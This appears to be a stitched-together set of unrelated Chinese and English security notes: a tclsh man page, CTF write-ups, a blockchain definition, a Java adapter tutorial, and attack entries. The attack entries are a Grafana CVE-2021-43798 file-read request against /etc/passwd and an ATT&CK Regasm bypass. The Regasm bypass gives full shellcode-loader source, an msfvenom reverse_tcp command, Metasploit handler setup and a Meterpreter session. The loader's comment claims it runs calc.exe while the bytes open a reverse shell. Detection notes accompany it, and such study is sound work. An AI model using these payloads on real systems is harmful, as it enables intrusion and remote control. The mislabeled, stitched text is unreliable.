.BE, everything will be '\" enclosed in one large box. '\" '\" .BE '\" End of box enclosure. '\" '\" .CS '\" Begin code excerpt. '\" '\" .CE '\" End code excerpt. '\" '\" .VS ?version? ?br? '\" Begin vertical sidebar, for use in marking newly-changed parts '\" of man pages. The first argument is ignored and used for recording '\" the version when the .VS was added, so that the sidebars can be '\" found and removed when they reach a certain age. If another argument '\" is present, then a line break is forced before starting the sidebar. '\" '\" .VE '\" End of vertical sidebar. '\" '\" .DS '\" Begin an indented unfilled display. '\" '\" .DE '\" End of indented unfilled display. '\" '\" .SO '\" Start of list of standard options for a Tk widget. The '\" options follow on successive lines, in four columns separated '\" by tabs. '\" '\" .SE '\" End of list of standard options for a Tk widget. '\" '\" .OP cmdName dbName dbClass '\" Start of description of a specific option. cmdName gives the '\" option's name as specified in the class command, dbName gives '\" the option's name in the option database, and dbClass gives '\" the option's class in the option database. '\" '\" .UL arg1 arg2 '\" Print arg1 underlined, then print arg2 normally. '\" '\" # Set up traps and other miscellaneous stuff for Tcl/Tk man pages. .if t .wh -1.3i ^B .nr ^l \n(.l .ad b '\" # Start an argument description .de AP .ie !"\\$4"" .TP \\$4 .el \{\ . ie !"\\$2"" .TP \\n()Cu . el .TP 15 .\} .ta \\n()Au \\n()Bu .ie !"\\$3"" \{\ \&\\$1 \\fI\\$2\\fP (\\$3) .\".b .\} .el \{\ .br .ie !"\\$2"" \{\ \&\\$1 \\fI\\$2\\fP .\} .el \{\ \&\\fI\\$1\\fP .\} .\} .. '\" # define tabbing values for .AP .de AS .nr )A 10n .if !"\\$1"" .nr )A \\w'\\$1'u+3n .nr )B \\n()Au+15n .\" .if !"\\$2"" .nr )B \\w'\\$2'u+\\n()Au+3n .nr )C \\n()Bu+\\w'(in/out)'u+2n .. .AS Tcl_Interp Tcl_CreateInterp in/out '\" # BS - start boxed text '\" # ^y = starting y location '\" # ^b = 1 .de BS .br .mk ^y .nr ^b 1u .if n .nf .if n .ti 0 .if n \l'\\n(.lu\(ul' .if n .fi .. '\" # BE - end boxed text (draw box now) .de BE .nf .ti 0 .mk ^t .ie n \l'\\n(^lu\(ul' .el \{\ .\" Draw four-sided box normally, but don't draw top of .\" box if the box started on an earlier page. .ie !\\n(^b-1 \{\ \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .el \}\ \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .\} .fi .br .nr ^b 0 .. '\" # VS - start vertical sidebar '\" # ^Y = starting y location '\" # ^v = 1 (for troff; for nroff this doesn't matter) .de VS .if !"\\$2"" .br .mk ^Y .ie n 'mc \s12\(br\s0 .el .nr ^v 1u .. '\" # VE - end of vertical sidebar .de VE .ie n 'mc .el \{\ .ev 2 .nf .ti 0 .mk ^t \h'|\\n(^lu+3n'\L'|\\n(^Yu-1v\(bv'\v'\\n(^tu+1v-\\n(^Yu'\h'-|\\n(^lu+3n' .sp -1 .fi .ev .\} .nr ^v 0 .. '\" # Special macro to handle page bottom: finish off current '\" # box/sidebar if in box/sidebar mode, then invoked standard '\" # page bottom macro. .de ^B .ev 2 'ti 0 'nf .mk ^t .if \\n(^b \{\ .\" Draw three-sided box if this is the box's first page, .\" draw two sides but no top otherwise. .ie !\\n(^b-1 \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .el \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .\} .if \\n(^v \{\ .nr ^x \\n(^tu+1v-\\n(^Yu \kx\h'-\\nxu'\h'|\\n(^lu+3n'\ky\L'-\\n(^xu'\v'\\n(^xu'\h'|0u'\c .\} .bp 'fi .ev .if \\n(^b \{\ .mk ^y .nr ^b 2 .\} .if \\n(^v \{\ .mk ^Y .\} .. '\" # DS - begin display .de DS .RS .nf .sp .. '\" # DE - end display .de DE .fi .RE .sp .. '\" # SO - start of list of standard options .de SO .SH "STANDARD OPTIONS" .LP .nf .ta 5.5c 11c .ft B .. '\" # SE - end of list of standard options .de SE .fi .ft R .LP See the \\fBoptions\\fR manual entry for details on the standard options. .. '\" # OP - start of full description for a single option .de OP .LP .nf .ta 4c Command-Line Name: \\fB\\$1\\fR Database Name: \\fB\\$2\\fR Database Class: \\fB\\$3\\fR .fi .IP .. '\" # CS - begin code excerpt .de CS .RS .nf .ta .25i .5i .75i 1i .. '\" # CE - end code excerpt .de CE .fi .RE .. .de UL \\$1\l'|0\(ul'\\$2 .. .TH tclsh 1 "" Tcl "Tcl Applications" .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME tclsh \- 包含 Tcl 解释器的简单的 shell .SH "总览 SYNOPSIS" \fBtclsh\fR ?\fIfileName arg arg ...\fR? .BE .SH "描述" .PP \fBTclsh\fR 是一个 shell 类应用程序,从它的标准输入或一个文件读 Tcl 命令并对其求值(evaluate)。 如果你不加参数的调用,则它交互式的执行,从标准输入读 Tcl 命令并向标准输出打印命令结果和出错信息。它一直运行直到调用 \fBexit\fR 命令或在它的标准输入上读到文件结束。如果在用户的主(home)目录里存在一个文件 \fB.tclshrc\fR (或在 Windows 平台上的 \fBtclshrc.tcl\fR),在从标准输入读第一条命令之前,\fBtclsh\fR 把这个文件作为一个 Tcl 脚本来求值。 .SH "脚本文件 SCRIPT FILES" .PP 如果加参数调用 \fBtclsh \fR则第一个参数是脚本文件的名字而任何额外的参数作为给脚本使用的变量(见后)。 \fBtclsh\fR 将从指名的文件中读 Tcl 命令而不是从标准输入读取;当到达文件结束时 \fBtclsh\fR 将退出。在这种情况下不自动的对 \fB.tclshrc\fR 求值,如果需要的话,脚本文件总是可以 \fBsource\fR(包含)它。 .PP 如果你建立的 Tcl 脚本文件的第一行是 .CS \fB#!/usr/local/bin/tclsh\fR .CE 则如果你把它标记为可执行的,接着就可以直接在你的 shell 中调用这个脚本文件。这里假定了\fB tclsh\fR 被安装在缺省的位置 /usr/local/bin;如果它被安装在其他地方,那么你需要修改上述行来匹配之。许多 UNIX 系统不允许 \fB#!\fR 行超出 30 个字符的长度,所以要确定 \fBtclsh\fR 可执行文件能被用短文件名访问。 .PP 一个更好的途径是用下面三行来开始你的脚本文件: .CS \fB#!/bin/sh # the next line restarts using tclsh \e exec tclsh "$0" "$@"\fR .CE 这种方法比起前面的段落有三个好处。首先,\fBtclsh\fR 二进制文件的位置不需要填入(hard-wired into) 脚本中: 它可以在你的 shell 查找路径中的任何地方。其次,他超越了(get around)了上种方法的 30 字符的文件名的限制。第三,这种方法在 \fBtclsh\fR 自身也是 shell 脚本时仍可运行(一些系统要处理多体系或操作系统: \fBtclsh\fR 脚本选择某个二进制文件来运行)。第三行导致 \fBsh\fR 和 \fBtclsh\fR 两者来处理脚本,但 \fBexec\fR 只被 \fBsh \fR执行。 \fBsh\fR 首先处理脚本文件;它把第二行作为脚本文件对待并执行第三行。\fBexec\fR 语句导致 shell 停止处理而启动 \fBtclsh\fR 来重新处理整个脚本。当 \fBtclsh\fR 启动时,因为第二行的反斜线导致第三行被作为第二行注释的一部分,它把所有三行都作为注释对待。 .PP .VS You should note that it is also common practise to install tclsh with its version number as part of the name. This has the advantage of allowing multiple versions of Tcl to exist on the same system at once, but also the disadvantage of making it harder to write scripts that start up uniformly across different versions of Tcl. .VE .SH "变量 VARIABLES" .PP \fBTclsh\fR 设置了下列 Tcl 变量: .TP 15 \fBargc\fR 包含 \fIarg\fR 参数的个数(没有则为 0),不包括脚本文件的名字。 .TP 15 \fBargv\fR 包含一个 Tcl 列表,其元素依次是 \fIarg\fR 参数,如果没有 \fIarg\fR 参数则是一个空串。 .TP 15 \fBargv0\fR 如果指定了 \fIfileName\fR 则在此包含。否则。包含调用 \fBtclsh\fR 使用的名字。 .TP 15 \fBtcl_interactive\fR 如果交互式运行 \fBtclsh\fR 则包含 1(不指定\fIfileName\fR 并且标准输入是一个终端类设备),否则是 0。 .SH "提示符 PROMPTS" .PP 当交互式的调用 \fBtclsh\fR 时,它通常为每条命令提示\(lq\fB%\fR\(rq。你可以通过设置变量 \fBtcl_prompt1\fR 和 \fBtcl_prompt2\fR 来改变提示符。如果存在变量 \fBtcl_prompt1\fR 则它必须由一个输出一个提示符的 Tcl 脚本组成;\fBtclsh\fR 对 \fBtcl_prompt1\fR 中的脚本求值而不是输出一个提示符。变量 \fBtcl_prompt2\fR 以类似的方式用在键入了换行而当前命令却不完整的时候;如果没设置 \fBtcl_prompt2\fR 则对不完整的命令不给以提示符。 .SH "关键字 KEYWORDS" argument, interpreter, prompt, script file, shell .SH "[中文版维护人]" .B 寒蝉退士 .SH "[中文版最新更新]" .B 2001/06/20 .SH "《中国linux论坛man手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
# Lone authot (forensics) In the task we get a [zip file](lone_author.zip) which seems corrupted. We notice that the PK headers are not right. It should always be `04034b50` and in our case the 3rd byte is wrong. We also notice that it's not any accidental flip. Once we extract all wrong headers we can see a pattern: ``` PKF PKl PKa PKg PK{ PKM PK3 PK3 PKt PK_M PK3 PK_1 ``` So we've got a flag prefix -> `Flag{M33t_M3_1` Once we fix those headers, we can finally extract the archive and we get [password protected zip](secret.zip) and [a piece of qr code](qr_ps.tif). We initially thought we have to somehow fix the QR, but it turned out that in metadata there is: `<pdf:Author>Password to the second part is 0xNOX**</pdf:Author>` We used this password on the zip archive we got, and we managed to extract the file: ![](export.png) This makes up the whole flag: `Flag{M33t_M3_1n_tHe_p4RK_T0mOrrOW}`
sec-knowleage
# Public Blockchain Security Overview ## 定义 > A public blockchain has absolutely no access restrictions. Anyone with an Internet connection can send transactions to it as well as become a validator (i.e., participate in the execution of a consensus protocol). Usually, such networks offer economic incentives for those who secure them and utilize some type of a Proof of Stake or Proof of Work algorithm. > Some of the largest, most known public blockchains are the bitcoin blockchain and the Ethereum blockchain. ------ from [wikipedia](https://en.wikipedia.org/wiki/Blockchain#Public_blockchains)
sec-knowleage
# Grafana 8.x 插件模块目录穿越漏洞(CVE-2021-43798) Grafana是一个开源的度量分析与可视化套件。在2021年12月,推特用户@j0v 发表了他发现的一个0day,攻击者利用这个漏洞可以读取服务器上的任意文件。 参考链接: - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/ - https://twitter.com/hacker_/status/1467880514489044993 - https://nosec.org/home/detail/4914.html - https://mp.weixin.qq.com/s/dqJ3F_fStlj78S0qhQ3Ggw ## 漏洞环境 执行如下命令启动一个Grafana 8.2.6版本服务器: ``` docker compose up -d ``` 服务启动后,访问`http://your-ip:3000`即可查看登录页面,但是这个漏洞是无需用户权限的。 ## 漏洞复现 这个漏洞出现在插件模块中,这个模块支持用户访问插件目录下的文件,但因为没有对文件名进行限制,攻击者可以利用`../`的方式穿越目录,读取到服务器上的任意文件。 利用这个漏洞前,我们需要先获取到一个已安装的插件id,比如常见的有: ``` alertlist cloudwatch dashlist elasticsearch graph graphite heatmap influxdb mysql opentsdb pluginlist postgres prometheus stackdriver table text ``` 再发送如下数据包,读取任意文件(你也可以将其中的`alertlist`换成其他合法的插件id): ``` GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: 192.168.1.112:3000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Connection: close ``` ![](1.png)
sec-knowleage
# T11218-009-win-基于白名单Regasm.exe执行payload ## 来自ATT&CK的描述 Windows命令行实用程序Regsvcs和Regasm用于注册.NET COM(组件对象模型)程序集。两者都是微软数字签名的。 攻击者可能会使用Regsvcs和Regasm通过受信任的Windows实用程序来代理执行代码。这两个实用程序都可以通过使用二进制文件中的属性,[ComRegisterFunction]或[ComUnregisterFunction],来指定应在注册或注销之前分别运行的代码,从而绕过进程白名单。 即使进程在没有足够权限的情况下运行并且执行失败,也将执行具有注册和注销属性的代码。 ## 测试案例 Regasm 为程序集注册工具,读取程序集中的元数据,并将所需的项添加到注册表中。RegAsm.exe是Microsoft Corporation开发的合法文件进程。它与Microsoft.NET Assembly Registration Utility相关联。 说明:Regasm.exe所在路径没有被系统添加PATH环境变量中,因此,REGASM命令无法识别。 具体参考微软官方文档: <https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool> 补充说明:在高版本操作系统中,可以通过配置策略,对进程命令行参数进行记录。日志策略开启方法:`本地计算机策略>计算机配置>管理模板>系统>审核进程创建>在过程创建事件中加入命令行>启用`,同样也可以在不同版本操作系统中部署sysmon,通过sysmon日志进行监控。 win7默认路径 `C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe` ## 检测日志 windows 安全日志(需要自行配置) ## 测试复现 ### 环境准备 攻击机:Kali2019 靶机:windows server 2012 ### 攻击分析 #### 生成恶意dll的cs文件 下载地址:<https://github.com/222222amor/exp_notes/commit/d3471f1d4617fd5423bb85d41b4ec4f8c72332fc> ```c# using System; using System.EnterpriseServices; using System.Runtime.InteropServices; /* Author: Casey Smith, Twitter: @subTee License: BSD 3-Clause Create Your Strong Name Key -> key.snk $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $Content = [System.Convert]::FromBase64String($key) Set-Content key.snk -Value $Content -Encoding Byte C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll [OR] C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll //Executes UnRegisterClass If you don't have permissions C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll //This calls the UnregisterClass Method */ namespace regsvcser { public class Bypass : ServicedComponent { public Bypass() { Console.WriteLine("I am a basic COM Object"); } [ComRegisterFunction] //This executes if registration is successful public static void RegisterClass ( string key ) { Console.WriteLine("I shouldn't really execute"); Shellcode.Exec(); } [ComUnregisterFunction] //This executes if registration fails public static void UnRegisterClass ( string key ) { Console.WriteLine("I shouldn't really execute either."); Shellcode.Exec(); } } public class Shellcode { public static void Exec() { // native function's compiled code // generated with metasploit // executes calc.exe byte[] shellcode = new byte[341] { #替换成你自己生成的 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, 0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c, 0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54, 0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0x7e,0x92, 0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50, 0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5, 0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67, 0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff, 0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00, 0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56, 0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58, 0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5, 0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85, 0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1, 0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 }; UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; // prepare data IntPtr pinfo = IntPtr.Zero; // execute native code hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); return; } private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); } } ``` #### msfvenom生成C#格式的payload ```bash msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.126.146 LPORT=4444 -f csharp ``` #### 生成DLL ```bash C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Micropoor.dll /unsafe C:\Users\Administrator\Desktop\a\regsvcs.cs #keyfile:key.snk 可忽略 ``` regsvcs.exe加载或卸载指定dll时该dll必须签名才可执行成功,因此命令中使用的key.snk文件为dll签名文件,是由sn.exe生成的公钥和私钥对,如果没有sn命令你可能需要安装vs或者Microsoft SDKs。命令:`sn.exe -k key.snk` #### 执行监听 攻击机,注意配置set AutoRunScript migrate f (AutoRunScript是msf中一个强大的自动化的后渗透工具,这里migrate参数是迁移木马到其他进程) ```bash msf5 > use exploits/multi/handler msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.126.146 lhost => 192.168.126.146 msf5 exploit(multi/handler) > set lport 4444 lport => 4444 msf5 exploit(multi/handler) > set AutoRunScript migrate f AutoRunScript => migrate f msf5 exploit(multi/handler) > exploit ``` #### 靶机执行payload ```cmd C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Micropoor.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Micropoor.dll ``` #### 反弹shell ```bash msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.126.146:4444 [*] Sending stage (180291 bytes) to 192.168.126.156 [*] Meterpreter session 2 opened (192.168.126.146:4444 -> 192.168.126.156:49963) at 2020-04-13 17:24:11 +0800 meterpreter > getsid Server SID: S-1-5-21-3661619627-1912079458-2426250727-500 ``` ## 测试留痕 经过配置后安全日志能够清晰的记录命令行参数,截取windows安全事件4688进程创建部分内容: ```log 进程信息: #4688-1 新进程 ID:0x9f8 新进程名称:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 令牌提升类型:TokenElevationTypeDefault (1) 创建者进程 ID:0x13c 进程命令行:C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Micropoor.dll 进程信息: #4688-2 新进程 ID:0x8f0 新进程名称:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 令牌提升类型:TokenElevationTypeDefault (1) 创建者进程 ID:0x13c 进程命令行:C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Micropoor.dll ``` ## 检测规则/思路 通过进程监控来检测和分析Regsvcs.exe和Regasm.exe的执行和参数。比较Regsvcs.exe和Regasm.exe的近期调用与历史已知合法参数及已执行二进制文件来确定是否有异常和潜在的攻击活动。在Regsvcs.exe或Regasm.exe调用之前和之后使用的命令参数也可用于确定正在执行的二进制文件的来源和目的。 ## 参考推荐 MITRE-ATT&CK-T1218-009 <https://attack.mitre.org/techniques/T1218/009/> 基于白名单Regasm.exe执行payload <https://micro8.gitbook.io/micro8/contents-1/71-80/73-ji-yu-bai-ming-dan-regasm.exe-zhi-hang-payload-di-san-ji> 免杀远控专题 <http://sec.nmask.cn/article_content?a_id=8233eefd6b2671799b46d7cbab7ee672>
sec-knowleage
## 1. 适配器(Adapter) ### Intent 把一个类接口转换成另一个用户需要的接口。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/3d5b828e-5c4d-48d8-a440-281e4a8e1c92.png"/> </div><br> ### Class Diagram <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/image-20201117020248795.png"/> </div><br> ### Implementation 鸭子(Duck)和火鸡(Turkey)拥有不同的叫声,Duck 的叫声调用 quack() 方法,而 Turkey 调用 gobble() 方法。 要求将 Turkey 的 gobble() 方法适配成 Duck 的 quack() 方法,从而让火鸡冒充鸭子! ```java public interface Duck { void quack(); } ``` ```java public interface Turkey { void gobble(); } ``` ```java public class WildTurkey implements Turkey { @Override public void gobble() { System.out.println("gobble!"); } } ``` ```java public class TurkeyAdapter implements Duck { Turkey turkey; public TurkeyAdapter(Turkey turkey) { this.turkey = turkey; } @Override public void quack() { turkey.gobble(); } } ``` ```java public class Client { public static void main(String[] args) { Turkey turkey = new WildTurkey(); Duck duck = new TurkeyAdapter(turkey); duck.quack(); } } ``` ### JDK - [java.util.Arrays#asList()](http://docs.oracle.com/javase/8/docs/api/java/util/Arrays.html#asList%28T...%29) - [java.util.Collections#list()](https://docs.oracle.com/javase/8/docs/api/java/util/Collections.html#list-java.util.Enumeration-) - [java.util.Collections#enumeration()](https://docs.oracle.com/javase/8/docs/api/java/util/Collections.html#enumeration-java.util.Collection-) - [javax.xml.bind.annotation.adapters.XMLAdapter](http://docs.oracle.com/javase/8/docs/api/javax/xml/bind/annotation/adapters/XmlAdapter.html#marshal-BoundType-)
sec-knowleage
## Try Harder (re, 300p) ### PL [ENG](#eng-version) Dostajemy [program](./re300) (elf), do zbadania. W przeciwieństwie do poprzedniego programu tutaj wiemy (czyżby?) od razu co powinniśmy zrobić - podajemy jakiś tekst (flagę) jako parametr w linii poleceń, a program wykonuje kilka sprawdzeń i odpowiada czy flaga jest OK czy nie. Zaczynamy więc analizę testów przeprowadzanych na fladze (od teraz będę używać sformułowań "flaga" i "wprowadzony parametr" zamiennie), jak leci: ```c++ if ( argc != 2 || strlen(argv[1]) > 0x64 ) { tryharder(); // wypisanie błędu i zakończenie działania } ``` Test zerowy, sprawdzenie czy flaga nie jest dłuższa niż 0x64 znaki. Oczywiście trywialnie go spełnić (nie podawać dłuższej flagi). ```c++ bool check_1(char *flag) { int i; for (i = 0; flag[i]; ++i); return i == 37; } ``` Test pierwszy - sprawdzenie czy flaga ma dokładnie 37 znaków długości. Również banalnie go spełnić, starczy podać programowi flagę o odpowiedniej długości. Kolejny test (za dużo kodu jak na prosty koncept) - sprawdza czy flaga matchuje do wzorca `DCTF{[A-Za-z0-9]`. I trzeci test podobny - dzieli 32 znaki flagi znajdujące się za `DCTF{` na 4bajtowe fragmenty, i każdy z nich matchuje z regexem - każdy 4bajtowy blok musiał pasować do odpowiedniego z tych regexów (w kolejności): '^9[0-2]6[4-7]' '^[0-5][0-6][b-c]5' '^0[1-6][1-6][1-6]' '^[6-9]0b0' '^a[0-6]' '^47[e-f]c' '^47[2-f][2-3]' '^5[e-f]8[e-f]' Zaimplementowaliśmy nawet generator wszystkich możliwych flag w pythonie, co okazało sie kompletnie niepotrzebne. To był ostatni test - w tym momencie program mówi "Well done" po podaniu flagi. Niestety, co nas bardzo zaskoczyło, strona odrzucała dalej naszą flagę. Dopiero po chwili zorientowaliśmy się, że program nie kończy sie od razu po wyjściu z funkcji 'main' - są jeszcze destruktory. A w destruktorach leżał kod odpowiadający czemuś takiemu: ```c++ int check(char *s) { signed int i; uint32_t v2_0 = 0; uint64_t v2_1 = 0; v2_0 = strlen(s); for ( i = 5; i < v2_0; ++i ) { v2_1 += -3 * s[i] + 36 + (int64_t)(s[i] ^ 0x2FCFBA); } int64_t result = v2_1 - 74431661 * (((int64_t)((unsigned __int128)((unsigned __int128)8315950649585666743LL * (unsigned __int128)v2_1) >> 64) >> 25) - (v2_1 >> 63)); return result == 25830287; } ``` Wygląda to na skomplikowane działania, nawet nie próbowaliśmy tutaj nic reversować. Za to po prostu napisaliśmy bruferorcer w C++, który generował możliwe flagi, i sprawdzał dla każdej czy przechodzi ona funkcję 'check'. W ten sposób dość szybko znaleźliśmy "prawdziwą" flagę, przyjmowaną przez stronę (która również nie była unikalna): DCTF{906400b5011160b0a19f47ec47b35f8f ### ENG version We get a [binary](./re300) (elf), do work with. Unlike in previous task, this time we know (do we really?) what to do from the beginning - we input some text (we assume a flag) as a parameter in command line and the program checks it and tells us if the flag is good or not. We start the analysis of the tests that are performed on the flag (from now on I will use `flag` and `input parameter` to name the same thing), as follows: ```c++ if ( argc != 2 || strlen(argv[1]) > 0x64 ) { tryharder(); // print error and exit } ``` Test zero, we check if the flag is not longer than 0x64 characters. Trivial to do (just don't input longer flag). ```c++ bool check_1(char *flag) { int i; for (i = 0; flag[i]; ++i); return i == 37; } ``` Test one - check if the flag has exactly 37 characters. Easy to fulfill, we just need to input flag with exactly the right length. Next test (too much code for this simple rule, we just provide the pattern) - check if the flag matches `DCTF{[A-Za-z0-9]`. Third test is similar - splits 32 characters of the flag that are after `DCTF{` into 4-byte parts and each one of them is matched with a regular expression - each part had to match following pattern (in order): '^9[0-2]6[4-7]' '^[0-5][0-6][b-c]5' '^0[1-6][1-6][1-6]' '^[6-9]0b0' '^a[0-6]' '^47[e-f]c' '^47[2-f][2-3]' '^5[e-f]8[e-f]' We even implemented a generator for all possible flags in python, which turned out not useful in the end. This was the lats test - now the binary was printing `Well done` after we put the flag. Unfortunately, surprisingly for us, the website was rejecting our flag. After a while we realised that the program in fact does not end right after leaving `main` function - there are destructors. In the destructors there was a code: ```c++ int check(char *s) { signed int i; uint32_t v2_0 = 0; uint64_t v2_1 = 0; v2_0 = strlen(s); for ( i = 5; i < v2_0; ++i ) { v2_1 += -3 * s[i] + 36 + (int64_t)(s[i] ^ 0x2FCFBA); } int64_t result = v2_1 - 74431661 * (((int64_t)((unsigned __int128)((unsigned __int128)8315950649585666743LL * (unsigned __int128)v2_1) >> 64) >> 25) - (v2_1 >> 63)); return result == 25830287; } ``` This looks like some complex calculations, so we 